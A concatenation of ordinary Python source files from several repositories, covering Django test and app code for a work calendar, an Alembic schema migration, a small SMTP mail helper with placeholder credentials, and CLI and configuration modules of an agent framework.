self.assertEqual(len(substitutes), 2)
one, two = substitutes
self.assertEqual(one.nutriscore, "nutriscore-a.png")
def test_disable_doubles(self):
"""Test disable_doubles function."""
user = User.objects.create_user(username="foo", password="<PASSWORD>")
product = Product.objects.get(name="prod-0")
substituted = Product.objects.get(name="prod-1")
substitute = Substitute.objects.create(base_product=product,
substituted=substituted,
user=user)
substitutes = [substituted]
disable_doubles(substitutes, user)
self.assertTrue(substitutes[0].double)
``` |
{
"source": "8area8/plenkton-api",
"score": 2
} |
#### File: alembic/versions/1ffedfb6ea81_base.py
```python
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = "1ffedfb6ea81_base"
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
op.create_table(
"authors",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("auth0_id", sa.String(length=255), nullable=False),
sa.Column("email", sa.String(length=255), nullable=False),
sa.Column("username", sa.String(length=255), nullable=False),
sa.Column("is_admin", sa.Boolean(), nullable=True),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("auth0_id"),
)
op.create_table(
"tags",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("name", sa.String(length=255), nullable=False),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("name"),
)
op.create_table(
"articles",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("name", sa.String(length=100), nullable=False),
sa.Column("teaser", sa.String(length=500), nullable=False),
sa.Column("body", sa.Text(), nullable=False),
sa.Column("author", sa.Integer(), nullable=False),
sa.Column("created_at", sa.DateTime(), nullable=True),
sa.Column("modified_at", sa.DateTime(), nullable=True),
sa.ForeignKeyConstraint(
["author"], ["authors.id"], name="fk_articles_authors_id_author"
),
sa.PrimaryKeyConstraint("id"),
sa.UniqueConstraint("name"),
)
op.create_table(
"articles_tags",
sa.Column("id", sa.Integer(), nullable=False),
sa.Column("tag", sa.Integer(), nullable=True),
sa.Column("article", sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(
["article"],
["articles.id"],
name="fk_articles_tags_articles_article_id",
onupdate="CASCADE",
ondelete="CASCADE",
),
sa.ForeignKeyConstraint(
["tag"],
["tags.id"],
name="fk_articles_tags_tags_tag_id",
onupdate="CASCADE",
ondelete="CASCADE",
),
sa.PrimaryKeyConstraint("id"),
)
def downgrade():
op.drop_table("articles_tags")
op.drop_table("articles")
op.drop_table("tags")
op.drop_table("authors")
``` |
{
"source": "8area8/work-calendar",
"score": 3
} |
#### File: management/commands/add_samples.py
```python
from django.core.management.base import BaseCommand
from django.contrib.auth import get_user_model
from django.db.utils import IntegrityError
from back.apps.worker.models import Employee
class Command(BaseCommand):
"""Command class."""
help = "Add data sample."
def handle(self, *args, **options):
"""Handle command."""
User = get_user_model()
try:
User.objects.create_superuser(
username="admin", email="<EMAIL>", password="<PASSWORD>"
)
except IntegrityError:
print("Admin user is already defined.")
try:
User.objects.create_user(
username="john", email="<EMAIL>", password="<PASSWORD>"
)
except IntegrityError:
print("user is already defined.")
try:
Employee.objects.create(name="foo", salary=10, preference="morning")
Employee.objects.create(name="bar", salary=11, preference="evening")
except IntegrityError:
print("Employees are already defined.")
```
#### File: apps/worker/models.py
```python
from typing import Tuple, List
from datetime import datetime, date
from calendar import Calendar, monthrange
from django.contrib.postgres.fields import ArrayField
from django.db import IntegrityError
from django.db import transaction
from django.db import models
PREFERENCE_CHOICE = (("morning", 0), ("evening", 1))
DAYS_CHOICE = (
("monday", 0),
("tuesday", 1),
("wednesday", 2),
("thursday", 3),
("friday", 4),
("saturday", 5),
("sunday", 6),
)
class Employee(models.Model):
"""Employee model."""
salary = models.IntegerField()
name = models.CharField(max_length=30, unique=True)
preference = models.CharField(choices=PREFERENCE_CHOICE, max_length=20)
off = ArrayField(
models.CharField(choices=DAYS_CHOICE, max_length=30, null=True),
default=list,
blank=True,
)
class DayManager(models.Manager):
"""Manager for Day."""
MAX_MONTHS = 12
def set_month(self, from_now: int) -> Tuple[int, int]:
"""Return the month and the year.
Args:
from_now (int): the number of month from now.
Returns:
tuple: the month and the year.
"""
now = datetime.now()
month = now.month + from_now
month = month % self.MAX_MONTHS or 1
year = now.year + month // self.MAX_MONTHS
return month, year
def get_month(
self, from_now: int = 0, until_last_of_week: bool = True
) -> "DayManager":
"""Get a month."""
month, year = self.set_month(from_now)
monthdays: List[List[date]] = Calendar().monthdatescalendar(year, month)
first_week = monthdays[0]
last_week = monthdays[-1]
start = first_week[0]
if until_last_of_week:
end = last_week[-1]
else:
day_number = monthrange(year, month)[-1]
end = date(year, month, day_number)
return self.filter(date__range=(start, end)).order_by("date")
def create_month(self, from_now: int = 0) -> None:
"""Create a new month."""
month, year = self.set_month(from_now)
monthdays = Calendar().monthdatescalendar(year, month)
days = [day for days in monthdays for day in days]
for day in days:
try:
with transaction.atomic():
self.create(date=day)
except IntegrityError:
print(f"{day} is a duplicate !")
class Day(models.Model):
"""Day model."""
date = models.DateField(unique=True)
employee = models.ManyToManyField(
Employee,
through="WorkDay",
through_fields=("day", "employee"),
)
objects: DayManager = DayManager()
def __str__(self):
"""Define the day."""
return f"{self.date.year}-{self.date.month}-{self.date.day}"
class WorkDay(models.Model):
"""Work Day class."""
employee = models.ForeignKey(Employee, on_delete=models.CASCADE)
day = models.ForeignKey(Day, on_delete=models.CASCADE)
start = models.DateTimeField(default=None)
end = models.DateTimeField(default=None)
```
#### File: apps/worker/urls.py
```python
from django.urls import path, include, register_converter
from rest_framework.routers import DefaultRouter
from . import views
class NegativeIntConverter:
"""URL converter - catch negative integers."""
regex = r"-?\d+"
def to_python(self, value):
"""To python."""
return int(value)
def to_url(self, value):
"""To url."""
return "%d" % value
register_converter(NegativeIntConverter, "negint")
router = DefaultRouter()
router.register("employees", views.EmployeeViewSet)
router.register("workdays", views.WorkDayViewSet)
urlpatterns = [
path("", include(router.urls)),
path("month/<negint:from_now>/", views.get_month, name="get_month"),
path(
"workdays_from_day/<int:day_id>/",
views.get_workday_from_day_id,
name="workdays_from_day",
),
]
```
#### File: apps/worker/views.py
```python
from django.http.response import JsonResponse
from django.http import HttpRequest
from rest_framework import viewsets
from rest_framework.permissions import SAFE_METHODS, BasePermission
from rest_framework.decorators import api_view, permission_classes
from .models import Employee, Day, WorkDay
from .serializers import (
EmployeeSerializerForAdmin,
EmployeeSerializerForUser,
WorkDaySerializer,
)
class IsAdminOrAuthenticatedReadOnly(BasePermission):
"""Is admin or read only for authenticated users."""
def has_permission(self, request: HttpRequest, view):
"""Return bool."""
return (
request.method in SAFE_METHODS
and request.user.is_authenticated
or request.user.is_superuser
)
class EmployeeViewSet(viewsets.ModelViewSet):
"""Employee view set."""
queryset = Employee.objects.all()
permission_classes = [IsAdminOrAuthenticatedReadOnly]
def get_serializer_class(self):
"""Get the good serializer."""
if self.request.user.is_superuser:
return EmployeeSerializerForAdmin
return EmployeeSerializerForUser
@api_view(["GET"])
@permission_classes([IsAdminOrAuthenticatedReadOnly])
def get_month(request, from_now: int):
"""Return a list of days, from a specific month."""
days = []
queryset = Day.objects.get_month(from_now)
for day in queryset:
workdays = day.workday_set.values()
workdays = list(workdays)
workdays = [
{
"id": work["id"],
"day": work["day_id"],
"employee": work["employee_id"],
"start": work["start"],
"end": work["end"],
}
for work in workdays
]
serialized_day = {
"id": day.id,
"year": day.date.year,
"month": day.date.month,
"number": day.date.day,
"works": list(workdays),
}
days.append(serialized_day)
return JsonResponse(days, safe=False)
class WorkDayViewSet(viewsets.ModelViewSet):
"""WorkDay viewset."""
queryset = WorkDay.objects.all()
serializer_class = WorkDaySerializer
permission_classes = [IsAdminOrAuthenticatedReadOnly]
@api_view(["GET"])
@permission_classes([IsAdminOrAuthenticatedReadOnly])
def get_workday_from_day_id(request, day_id: int):
"""Return a list of workdays, from a specific day."""
workdays = []
queryset = WorkDay.objects.filter(day_id=day_id)
for workday in queryset:
serialized_workday = {
"id": workday.id,
"day": workday.day.id,
"employee": workday.employee.id,
"start": workday.start,
"end": workday.end,
}
workdays.append(serialized_workday)
return JsonResponse(workdays, safe=False)
```
#### File: back/tests/test_workday.py
```python
from datetime import datetime
import pytest
from back.apps.worker.management.commands import create_initial_days
from back.apps.worker.models import WorkDay
from back.tests import client, admin, user, employee, get_token
now = datetime.now().isoformat()
@pytest.mark.django_db
def test_work_day_attributes():
"""Test WorkDay attributes."""
assert WorkDay.id # type: ignore
assert WorkDay.day # type: ignore
assert WorkDay.employee # type: ignore
assert WorkDay.start # type: ignore
assert WorkDay.end # type: ignore
@pytest.mark.django_db
def test_retrieve_workday_in_month(client, admin, employee):
"""Find a specific workday."""
create_initial_days.Command().handle()
token_header = get_token(client)
response = client.get("/api/work/month/0/", **token_header)
day = response.json()[0]
response = client.post(
"/api/work/workdays/",
{"day": day["id"], "employee": employee.id, "start": now, "end": now},
**token_header,
)
assert response.status_code == 201
response = client.get("/api/work/month/0/", **token_header)
day = response.json()[0]
assert day["works"][0]["employee"] == employee.id
@pytest.mark.django_db
def test_work_day_admin_creation(admin, client, employee):
"""Test the work day creation."""
create_initial_days.Command().handle()
token_header = get_token(client)
response = client.get("/api/work/month/0/", **token_header)
day = response.json()[0]
response = client.post(
"/api/work/workdays/",
{"day": day["id"], "employee": employee.id, "start": now, "end": now},
**token_header,
)
assert response.status_code == 201
@pytest.mark.django_db
def test_work_day_not_admin_creation(user, client, employee):
"""Test fail work day creation."""
create_initial_days.Command().handle()
token_header = get_token(client, False)
response = client.get("/api/work/month/0/", **token_header)
day = response.json()[0]
response = client.post(
"/api/work/workdays/",
{"day": day["id"], "employee": employee.id, "start": now, "end": now},
**token_header,
)
assert response.status_code == 403
``` |
{
"source": "8Avalon8/pisces_af",
"score": 3
} |
#### File: pisces_af/utils/mail.py
```python
import smtplib
from email.mime.text import MIMEText
from email.header import Header
def SendEmail(content,title = u"Pisces自动测试异常报告"):
# Third-party SMTP service
subject = title
mailto_list=['<EMAIL>'] #Receiver(List)
mail_host="smtp.163.com" #smtp server address
mail_user="username" #Username
mail_pass="password" #password
mail_postfix="163.com" # mailbox domain suffix; for NetEase mail this is 163.com
me="PiscesAutotest"+"<"+mail_user+"@"+mail_postfix+">"
#content =
#print content
msg = MIMEText(content,'plain','utf-8')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = Header(me, 'utf-8')
msg['To'] = ";".join(mailto_list) # join the recipient list with ';'
try:
#print msg
server = smtplib.SMTP()
server.connect(mail_host) # connect to the SMTP server
server.login(mail_user,mail_pass) # log in
server.sendmail(me, mailto_list, msg.as_string())
server.close()
print u"邮件发送成功"
return True
except Exception, e:
print u"Error: 无法发送邮件"
print str(e)
return False
if __name__ == '__main__':
info = str(1) + "/" + str(3) + " passed"
##########Temp Usage, Should use Result Class to print
mail = u"================================================================\r\n"
mail += info+"\r\n"
mail += u"Fail Tasks:\r\n"
mail += "[Task1,Task2]" + "\r\n"
mail += u"Tasksuits执行完毕\r\n"
mail += u"================================================================\r\n"
SendEmail(mail)
``` |
{
"source": "8ball030/agents-aea",
"score": 2
} |
#### File: aea/cli/add.py
```python
import os
import shutil
import sys
from pathlib import Path
from typing import cast
import click
from click import pass_context
from jsonschema import ValidationError
from aea import AEA_DIR
from aea.cli.common import Context, pass_ctx, logger, _try_to_load_agent_config
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE, DEFAULT_CONNECTION_CONFIG_FILE, DEFAULT_SKILL_CONFIG_FILE, \
DEFAULT_PROTOCOL_CONFIG_FILE
from aea.cli.registry.utils import fetch_package, split_public_id
@click.group()
@click.option('--registry', is_flag=True, help="For adding from Registry.")
@pass_ctx
def add(ctx: Context, registry):
"""Add a resource to the agent."""
if registry:
ctx.set_config("is_registry", True)
_try_to_load_agent_config(ctx)
def _find_connection_locally(ctx, connection_name):
# check that the provided path points to a proper connection directory -> look for connection.yaml file.
# first check in aea dir
registry_path = ctx.agent_config.registry_path
connection_configuration_filepath = Path(os.path.join(registry_path, "connections", connection_name, DEFAULT_CONNECTION_CONFIG_FILE))
if not connection_configuration_filepath.exists():
# then check in registry
registry_path = AEA_DIR
connection_configuration_filepath = Path(os.path.join(registry_path, "connections", connection_name, DEFAULT_CONNECTION_CONFIG_FILE))
if not connection_configuration_filepath.exists():
logger.error("Cannot find connection: '{}'.".format(connection_name))
sys.exit(1)
# try to load the connection configuration file
try:
connection_configuration = ctx.connection_loader.load(open(str(connection_configuration_filepath)))
logger.info("Connection '{}' supports the following protocols: {}".format(connection_name, connection_configuration.restricted_to_protocols))
except ValidationError as e:
logger.error("Connection configuration file not valid: {}".format(str(e)))
sys.exit(1)
# copy the connection package into the agent's supported connections.
src = str(Path(os.path.join(registry_path, "connections", connection_name)).absolute())
dest = os.path.join(ctx.cwd, "connections", connection_name)
logger.debug("Copying connection modules. src={} dst={}".format(src, dest))
try:
shutil.copytree(src, dest)
except Exception as e:
logger.error(str(e))
sys.exit(1)
@add.command()
@click.argument(
'connection_name', type=str, required=True
)
@pass_context
def connection(click_context, connection_name):
"""Add a connection to the configuration file."""
ctx = cast(Context, click_context.obj)
agent_name = ctx.agent_config.agent_name
is_registry = ctx.config.get("is_registry")
if is_registry:
public_id = str(connection_name)
connection_name = split_public_id(connection_name)[1]
logger.info("Adding connection '{}' to the agent '{}'...".format(connection_name, agent_name))
# check if we already have a connection with the same name
logger.debug("Connections already supported by the agent: {}".format(ctx.agent_config.connections))
if connection_name in ctx.agent_config.connections:
logger.error("A connection with name '{}' already exists. Aborting...".format(connection_name))
sys.exit(1)
# find and add connection
if is_registry:
# fetch from Registry
fetch_package('connection', public_id=public_id, cwd=ctx.cwd)
else:
_find_connection_locally(ctx, connection_name)
# make the 'connections' folder a Python package.
connections_init_module = os.path.join(ctx.cwd, "connections", "__init__.py")
logger.debug("Creating {}".format(connections_init_module))
Path(connections_init_module).touch(exist_ok=True)
# add the connections to the configurations.
logger.debug("Registering the connection into {}".format(DEFAULT_AEA_CONFIG_FILE))
ctx.agent_config.connections.add(connection_name)
ctx.agent_loader.dump(ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), "w"))
def _find_protocol_locally(ctx, protocol_name):
# check that the provided path points to a proper protocol directory -> look for protocol.yaml file.
# first check in aea dir
registry_path = ctx.agent_config.registry_path
protocol_configuration_filepath = Path(os.path.join(registry_path, "protocols", protocol_name, DEFAULT_PROTOCOL_CONFIG_FILE))
if not protocol_configuration_filepath.exists():
# then check in registry
registry_path = AEA_DIR
protocol_configuration_filepath = Path(os.path.join(registry_path, "protocols", protocol_name, DEFAULT_PROTOCOL_CONFIG_FILE))
if not protocol_configuration_filepath.exists():
logger.error("Cannot find protocol: '{}'.".format(protocol_name))
sys.exit(1)
# try to load the protocol configuration file
try:
protocol_configuration = ctx.protocol_loader.load(open(str(protocol_configuration_filepath)))
logger.debug("Protocol available: {}".format(protocol_configuration.name))
except ValidationError as e:
logger.error("Protocol configuration file not valid: {}".format(str(e)))
sys.exit(1)
# copy the protocol package into the agent's supported connections.
src = str(Path(os.path.join(registry_path, "protocols", protocol_name)).absolute())
dest = os.path.join(ctx.cwd, "protocols", protocol_name)
logger.debug("Copying protocol modules. src={} dst={}".format(src, dest))
try:
shutil.copytree(src, dest)
except Exception as e:
logger.error(str(e))
sys.exit(1)
@add.command()
@click.argument(
'protocol_name', type=str, required=True
)
@pass_context
def protocol(click_context, protocol_name):
"""Add a protocol to the agent."""
ctx = cast(Context, click_context.obj)
agent_name = cast(str, ctx.agent_config.agent_name)
is_registry = ctx.config.get("is_registry")
if is_registry:
public_id = str(protocol_name)
protocol_name = split_public_id(protocol_name)[1]
logger.info("Adding protocol '{}' to the agent '{}'...".format(protocol_name, agent_name))
# check if we already have a protocol with the same name
logger.debug("Protocols already supported by the agent: {}".format(ctx.agent_config.protocols))
if protocol_name in ctx.agent_config.protocols:
logger.error("A protocol with name '{}' already exists. Aborting...".format(protocol_name))
sys.exit(1)
# find and add protocol
if is_registry:
# fetch from Registry
fetch_package('protocol', public_id=public_id, cwd=ctx.cwd)
else:
_find_protocol_locally(ctx, protocol_name)
# make the 'protocols' folder a Python package.
logger.debug("Creating {}".format(os.path.join(agent_name, "protocols", "__init__.py")))
Path(os.path.join(ctx.cwd, "protocols", "__init__.py")).touch(exist_ok=True)
# add the protocol to the configurations.
logger.debug("Registering the protocol into {}".format(DEFAULT_AEA_CONFIG_FILE))
ctx.agent_config.protocols.add(protocol_name)
ctx.agent_loader.dump(ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), "w"))
def _find_skill_locally(ctx, skill_name, click_context):
# check that the provided path points to a proper skill directory -> look for skill.yaml file.
# first check in aea dir
registry_path = ctx.agent_config.registry_path
skill_configuration_filepath = Path(os.path.join(registry_path, "skills", skill_name, DEFAULT_SKILL_CONFIG_FILE))
if not skill_configuration_filepath.exists():
# then check in registry
registry_path = AEA_DIR
skill_configuration_filepath = Path(os.path.join(registry_path, "skills", skill_name, DEFAULT_SKILL_CONFIG_FILE))
if not skill_configuration_filepath.exists():
logger.error("Cannot find skill: '{}'.".format(skill_name))
sys.exit(1)
# try to load the skill configuration file
try:
skill_configuration = ctx.skill_loader.load(open(str(skill_configuration_filepath)))
except ValidationError as e:
logger.error("Skill configuration file not valid: {}".format(str(e)))
sys.exit(1)
# copy the skill package into the agent's supported skills.
src = str(Path(os.path.join(registry_path, "skills", skill_name)).absolute())
dest = os.path.join(ctx.cwd, "skills", skill_name)
logger.debug("Copying skill modules. src={} dst={}".format(src, dest))
try:
shutil.copytree(src, dest)
except Exception as e:
logger.error(str(e))
sys.exit(1)
    # check for protocols the agent does not yet support, and add them.
for protocol_name in skill_configuration.protocols:
if protocol_name not in ctx.agent_config.protocols:
logger.debug("Adding protocol '{}' to the agent...".format(protocol_name))
click_context.invoke(protocol, protocol_name=protocol_name)
@add.command()
@click.argument('skill_name', type=str, required=True)
@pass_context
def skill(click_context, skill_name):
"""Add a skill to the agent."""
ctx = cast(Context, click_context.obj)
agent_name = ctx.agent_config.agent_name
is_registry = ctx.config.get("is_registry")
if is_registry:
public_id = str(skill_name)
skill_name = split_public_id(skill_name)[1]
logger.info("Adding skill '{}' to the agent '{}'...".format(skill_name, agent_name))
# check if we already have a skill with the same name
logger.debug("Skills already supported by the agent: {}".format(ctx.agent_config.skills))
if skill_name in ctx.agent_config.skills:
logger.error("A skill with name '{}' already exists. Aborting...".format(skill_name))
sys.exit(1)
    # find and add skill
if is_registry:
# fetch from Registry
fetch_package('skill', public_id=public_id, cwd=ctx.cwd)
else:
_find_skill_locally(ctx, skill_name, click_context)
# make the 'skills' folder a Python package.
skills_init_module = os.path.join(ctx.cwd, "skills", "__init__.py")
logger.debug("Creating {}".format(skills_init_module))
Path(skills_init_module).touch(exist_ok=True)
# add the skill to the configurations.
logger.debug("Registering the skill into {}".format(DEFAULT_AEA_CONFIG_FILE))
ctx.agent_config.skills.add(skill_name)
ctx.agent_loader.dump(ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), "w"))
```
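The two `add` sub-commands above are plain click commands, so they can also be exercised programmatically. Below is a minimal sketch using click's test runner; it assumes the `aea` package is installed (so that the bundled `oef` connection, `error` skill and `default` protocol can be found), and `fipa` is only an example of a protocol name assumed to exist in the registry.

```python
import os

from click.testing import CliRunner

from aea.cli.core import cli  # the click group defined in aea/cli/core.py below

runner = CliRunner()
with runner.isolated_filesystem():
    # 'create' already pulls in the default connection and the 'error' skill
    result = runner.invoke(cli, ["create", "my_agent"])
    assert result.exit_code == 0, result.output
    # the 'add' and 'list' commands operate on the current working directory
    os.chdir("my_agent")
    print(runner.invoke(cli, ["add", "protocol", "fipa"]).output)   # 'fipa' is an assumed registry entry
    print(runner.invoke(cli, ["list", "protocols"]).output)
```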
#### File: aea/cli/core.py
```python
import os
import shutil
import sys
from pathlib import Path
from typing import cast
import click
from click import pass_context
from jsonschema import ValidationError
import aea
from aea.cli.add import add
from aea.cli.add import connection, skill
from aea.cli.common import Context, pass_ctx, logger, _try_to_load_agent_config, DEFAULT_REGISTRY_PATH
from aea.cli.install import install
from aea.cli.list import list as _list
from aea.cli.loggers import simple_verbosity_option
from aea.cli.remove import remove
from aea.cli.run import run
from aea.cli.scaffold import scaffold
from aea.cli.search import search
from aea.configurations.base import DEFAULT_AEA_CONFIG_FILE, AgentConfig, PrivateKeyPathConfig
from aea.crypto.default import DefaultCrypto
from aea.crypto.ethereum import EthereumCrypto
from aea.crypto.fetchai import FetchAICrypto
from aea.crypto.helpers import DEFAULT_PRIVATE_KEY_FILE, FETCHAI_PRIVATE_KEY_FILE, ETHEREUM_PRIVATE_KEY_FILE, \
_validate_private_key_path
DEFAULT_CONNECTION = "oef"
DEFAULT_SKILL = "error"
@click.group(name="aea")
@click.version_option(aea.__version__, prog_name="aea")
@simple_verbosity_option(logger, default="INFO")
@click.pass_context
def cli(ctx) -> None:
"""Command-line tool for setting up an Autonomous Economic Agent."""
ctx.obj = Context(cwd=".")
@cli.command()
@click.argument('agent_name', type=str, required=True)
@pass_context
def create(click_context, agent_name):
"""Create an agent."""
ctx = cast(Context, click_context.obj)
path = Path(agent_name)
logger.info("Initializing AEA project '{}'".format(agent_name))
logger.info("Creating project directory '/{}'".format(agent_name))
# create the agent's directory
try:
path.mkdir(exist_ok=False)
# create a config file inside it
logger.info("Creating config file {}".format(DEFAULT_AEA_CONFIG_FILE))
config_file = open(os.path.join(agent_name, DEFAULT_AEA_CONFIG_FILE), "w")
agent_config = AgentConfig(agent_name=agent_name, aea_version=aea.__version__, authors="", version="v1", license="", url="", registry_path=DEFAULT_REGISTRY_PATH, description="")
agent_config.default_connection = DEFAULT_CONNECTION
ctx.agent_loader.dump(agent_config, config_file)
# next commands must be done from the agent's directory -> overwrite ctx.cwd
ctx.agent_config = agent_config
ctx.cwd = agent_config.agent_name
logger.info("Default connections:")
click_context.invoke(connection, connection_name=DEFAULT_CONNECTION)
logger.info("Default skills:")
click_context.invoke(skill, skill_name=DEFAULT_SKILL)
except OSError:
logger.error("Directory already exist. Aborting...")
sys.exit(1)
except ValidationError as e:
logger.error(str(e))
shutil.rmtree(agent_name, ignore_errors=True)
sys.exit(1)
except Exception as e:
logger.exception(e)
shutil.rmtree(agent_name, ignore_errors=True)
sys.exit(1)
@cli.command()
@click.argument('agent_name', type=click.Path(exists=True, file_okay=False, dir_okay=True), required=True)
@pass_ctx
def delete(ctx: Context, agent_name):
"""Delete an agent."""
path = Path(agent_name)
# check that the target folder is an AEA project.
cwd = os.getcwd()
try:
os.chdir(agent_name)
fp = open(DEFAULT_AEA_CONFIG_FILE, mode="r", encoding="utf-8")
ctx.agent_config = ctx.agent_loader.load(fp)
_try_to_load_agent_config(ctx)
except Exception:
logger.error("The name provided is not an AEA project.")
sys.exit(1)
finally:
os.chdir(cwd)
logger.info("Deleting agent project directory '/{}'...".format(path))
# delete the agent's directory
try:
shutil.rmtree(path, ignore_errors=False)
except OSError:
logger.error("An error occurred while deleting the agent directory. Aborting...")
sys.exit(1)
@cli.command()
@pass_ctx
def freeze(ctx: Context):
"""Get the dependencies."""
_try_to_load_agent_config(ctx)
for d in ctx.get_dependencies():
print(d)
@cli.command()
@pass_ctx
@click.option('-p', '--port', default=8080)
def gui(ctx: Context, port):
"""Run the CLI GUI."""
import aea.cli_gui # pragma: no cover
logger.info("Running the GUI.....(press Ctrl+C to exit)") # pragma: no cover
aea.cli_gui.run(port) # pragma: no cover
@cli.command()
@click.argument("type_", metavar="TYPE", type=click.Choice([
DefaultCrypto.identifier,
FetchAICrypto.identifier,
EthereumCrypto.identifier,
"all"]), required=True)
@pass_ctx
def generate_key(ctx: Context, type_):
"""Generate private keys."""
if type_ == DefaultCrypto.identifier or type_ == "all":
DefaultCrypto().dump(open(DEFAULT_PRIVATE_KEY_FILE, "wb"))
if type_ == FetchAICrypto.identifier or type_ == "all":
FetchAICrypto().dump(open(FETCHAI_PRIVATE_KEY_FILE, "wb"))
if type_ == EthereumCrypto.identifier or type_ == "all":
EthereumCrypto().dump(open(ETHEREUM_PRIVATE_KEY_FILE, "wb"))
@cli.command()
@click.argument("type_", metavar="TYPE", type=click.Choice([
DefaultCrypto.identifier,
FetchAICrypto.identifier,
EthereumCrypto.identifier
]), required=True)
@click.argument("file", metavar="FILE", type=click.Path(exists=True, file_okay=True, dir_okay=False, readable=True),
required=True)
@pass_ctx
def add_key(ctx: Context, type_, file):
"""Add a private key to the wallet."""
_try_to_load_agent_config(ctx)
_validate_private_key_path(file, type_)
try:
ctx.agent_config.private_key_paths.create(type_, PrivateKeyPathConfig(type_, file))
except ValueError as e: # pragma: no cover
logger.error(str(e)) # pragma: no cover
ctx.agent_loader.dump(ctx.agent_config, open(os.path.join(ctx.cwd, DEFAULT_AEA_CONFIG_FILE), "w"))
cli.add_command(add)
cli.add_command(_list)
cli.add_command(search)
cli.add_command(scaffold)
cli.add_command(remove)
cli.add_command(install)
cli.add_command(run)
```
#### File: aea/cli/list.py
```python
import os
import click
from aea.cli.common import Context, pass_ctx, _try_to_load_agent_config, retrieve_details, format_items
from aea.configurations.base import DEFAULT_CONNECTION_CONFIG_FILE, DEFAULT_SKILL_CONFIG_FILE, \
DEFAULT_PROTOCOL_CONFIG_FILE
@click.group()
@pass_ctx
def list(ctx: Context):
"""List the installed resources."""
_try_to_load_agent_config(ctx)
@list.command()
@pass_ctx
def connections(ctx: Context):
"""List all the installed connections."""
result = []
for connection_id in sorted(ctx.agent_config.connections):
connection_configuration_filepath = os.path.join("connections", connection_id, DEFAULT_CONNECTION_CONFIG_FILE)
details = retrieve_details(connection_id, ctx.connection_loader, connection_configuration_filepath)
result.append(details)
print(format_items(sorted(result, key=lambda k: k['name'])))
@list.command()
@pass_ctx
def protocols(ctx: Context):
"""List all the installed protocols."""
result = []
for protocol_id in sorted(ctx.agent_config.protocols):
protocol_configuration_filepath = os.path.join("protocols", protocol_id, DEFAULT_PROTOCOL_CONFIG_FILE)
details = retrieve_details(protocol_id, ctx.protocol_loader, protocol_configuration_filepath)
result.append(details)
print(format_items(sorted(result, key=lambda k: k['name'])))
@list.command()
@pass_ctx
def skills(ctx: Context):
"""List all the installed skills."""
result = []
for skill_id in sorted(ctx.agent_config.skills):
skill_configuration_filepath = os.path.join("skills", skill_id, DEFAULT_SKILL_CONFIG_FILE)
details = retrieve_details(skill_id, ctx.skill_loader, skill_configuration_filepath)
result.append(details)
print(format_items(sorted(result, key=lambda k: k['name'])))
```
#### File: aea/configurations/base.py
```python
from abc import ABC, abstractmethod
from typing import TypeVar, Generic, Optional, List, Tuple, Dict, Set, cast
DEFAULT_AEA_CONFIG_FILE = "aea-config.yaml"
DEFAULT_SKILL_CONFIG_FILE = "skill.yaml"
DEFAULT_CONNECTION_CONFIG_FILE = 'connection.yaml'
DEFAULT_PROTOCOL_CONFIG_FILE = 'protocol.yaml'
DEFAULT_PRIVATE_KEY_PATHS = {"default": "", "fetchai": "", "ethereum": ""}
T = TypeVar('T')
Address = str
ProtocolId = str
SkillId = str
class JSONSerializable(ABC):
"""Interface for JSON-serializable objects."""
@property
@abstractmethod
def json(self) -> Dict:
"""Compute the JSON representation."""
@classmethod
def from_json(cls, obj: Dict):
"""Build from a JSON object."""
class Configuration(JSONSerializable, ABC):
"""Configuration class."""
class CRUDCollection(Generic[T]):
"""Interface of a CRUD collection."""
def __init__(self):
"""Instantiate a CRUD collection."""
self._items_by_id = {} # type: Dict[str, T]
def create(self, item_id: str, item: T) -> None:
"""
Add an item.
:param item_id: the item id.
:param item: the item to be added.
:return: None
:raises ValueError: if the item with the same id is already in the collection.
"""
if item_id in self._items_by_id:
raise ValueError("Item with name {} already present!".format(item_id))
else:
self._items_by_id[item_id] = item
def read(self, item_id: str) -> Optional[T]:
"""
        Get an item by its id.
:param item_id: the item id.
:return: the associated item, or None if the item id is not present.
"""
return self._items_by_id.get(item_id, None)
def update(self, item_id: str, item: T) -> None:
"""
Update an existing item.
:param item_id: the item id.
:param item: the item to be added.
:return: None
"""
self._items_by_id[item_id] = item
def delete(self, item_id: str) -> None:
"""Delete an item."""
if item_id in self._items_by_id.keys():
del self._items_by_id[item_id]
def read_all(self) -> List[Tuple[str, T]]:
"""Read all the items."""
return [(k, v) for k, v in self._items_by_id.items()]
class PrivateKeyPathConfig(Configuration):
"""Handle a private key path configuration."""
def __init__(self, ledger: str = "", path: str = ""):
"""Initialize a handler configuration."""
self.ledger = ledger
self.path = path
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"ledger": self.ledger,
"path": self.path
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
ledger = cast(str, obj.get("ledger"))
path = cast(str, obj.get("path"))
return PrivateKeyPathConfig(
ledger=ledger,
path=path
)
class LedgerAPIConfig(Configuration):
"""Handle a ledger api configuration."""
def __init__(self, ledger: str = "", addr: str = "", port: int = 1000):
"""Initialize a handler configuration."""
self.ledger = ledger
self.addr = addr
self.port = port
@property
def json(self) -> Dict:
"""Return the JSON representation."""
return {
"ledger": self.ledger,
"addr": self.addr,
"port": self.port
}
@classmethod
def from_json(cls, obj: Dict):
"""Initialize from a JSON object."""
ledger = cast(str, obj.get("ledger"))
addr = cast(str, obj.get("addr"))
port = cast(int, obj.get("port"))
return LedgerAPIConfig(
ledger=ledger,
addr=addr,
port=port
)
class ConnectionConfig(Configuration):
"""Handle connection configuration."""
def __init__(self,
name: str = "",
authors: str = "",
version: str = "",
license: str = "",
url: str = "",
class_name: str = "",
restricted_to_protocols: Optional[Set[str]] = None,
dependencies: Optional[List[str]] = None,
description: str = "",
**config):
"""Initialize a connection configuration object."""
self.name = name
self.authors = authors
self.version = version
self.license = license
self.url = url
self.class_name = class_name
